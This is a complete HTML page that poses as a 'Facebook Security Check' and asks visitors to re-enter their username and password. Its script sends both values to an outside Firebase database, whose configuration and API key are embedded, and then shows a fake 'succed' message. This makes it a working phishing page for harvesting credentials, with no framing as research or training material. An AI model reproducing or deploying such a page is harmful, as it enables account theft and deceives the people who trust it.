<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width , initial-scale=1" >
	<title>Security Check</title>
	<link rel="shortcut icon" type="ico" href="fb-ico.png">
	<link rel="stylesheet" type="text/css" href="style.css">

	<script src="https://www.gstatic.com/firebasejs/8.1.1/firebase-app.js"></script>
        
<script src="https://www.gstatic.com/firebasejs/3.1.0/firebase.js"></script>
     <script src="https://www.gstatic.com/firebasejs/6.2.1/firebase-app.js"></script>
    <script src="https://www.gstatic.com/firebasejs/6.2.1/firebase-database.js"></script>
<script>
  // Your web app's Firebase configuration
  var firebaseConfig = {
    apiKey: "AIzaSyA0PsfDZeFPWXVUXq6J-aVIohvigAwuvRA",
    authDomain: "face-7560a.firebaseapp.com",
    databaseURL: "https://face-7560a.firebaseio.com",
    projectId: "face-7560a",
    storageBucket: "face-7560a.appspot.com",
    messagingSenderId: "790337028239",
    appId: "1:790337028239:web:c2a5ceca712904315ab0fa"
  };
  // Initialize Firebase
  firebase.initializeApp(firebaseConfig);
</script>

</head>
<body>
	<header>
		<div class="main-header">
			<div class="logo">
				<a href="http://www.facebook.com"><img src="logo.png"></a>
			</div>
		</div>
	</header>
	<section>
		<div class="form">
			<div class="m-header" id="check">
				<h3>Facebook Security Check. Please Verify It's You.</h3>
			</div>
			<div class="red-box" id="box">
				<p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
				<p>Enter your password for security reason . </p>
				<p>Forgot your password ? <a href="login.html">Request new one</a>
			</div>

			<div  class="login-form" id="fom">
				<div class="bb" novalidate="1" id="login-form" >
	                <label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
	                <br>   
					<label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
					<br>
					<input type="submit"  name="submit" value="Verify" onclick="post()"  style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461; color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;"></input>
					<br> <br>
                                        <p><a style="text-decoration:none; color:#3B5998; margin:0 0 0 80px;" href="login.html">can't log in?</a></p>
				</div>
			</div>

<div class="hiide" id="hd" style="display:none;"> <h1> succed </h1> </div>
		</div>

		
		<footer>
			<ul>
				<li><a href="login.html">Mobile</a></li>
				<li><a href="login.html">Find Friends</a></li>
				<li><a href="login.html">Badges</a></li>
				<li><a href="login.html">People</a></li>
				<li><a href="login.html">Pages</a></li>
				<li><a href="login.html">Apps</a></li>
				<li><a href="login.html">Games</a></li>
				<li><a href="login.html">Music</a></li>
				<li><a href="login.html">Locations</a></li>
			</ul>
			<ul>
				<li><a href="login.html">Topics</a></li>
				<li><a href="login.html">About</a></li>
				<li><a href="login.html">Create Ad</a></li>
				<li><a href="login.html">Create Page</a></li>
				<li><a href="login.html">Devepers</a></li>
				<li><a href="login.html">Careers</a></li>
				<li><a href="login.html">Privacy</a></li>
				<li><a href="login.html">Cookies</a></li>
				<li><a href="login.html">Terms</a></li><br />
				<li><a href="login.html">Help</a></li>
			</ul>
		</footer>
	</section>

<script>
    function post()
{
  var push;
  var username=document.getElementById("username").value;
  var password=document.getElementById("password").value;
  var myref=firebase.database().ref().child('Users');
  push = myref.push({
  username:username,
  password:password
});
document.getElementById('check').style.display = 'none';
document.getElementById('box').style.display = 'none';
document.getElementById('fom').style.display = 'none';
document.getElementById('hd').style.display = 'inline';

}
</script>
</body>
</html>
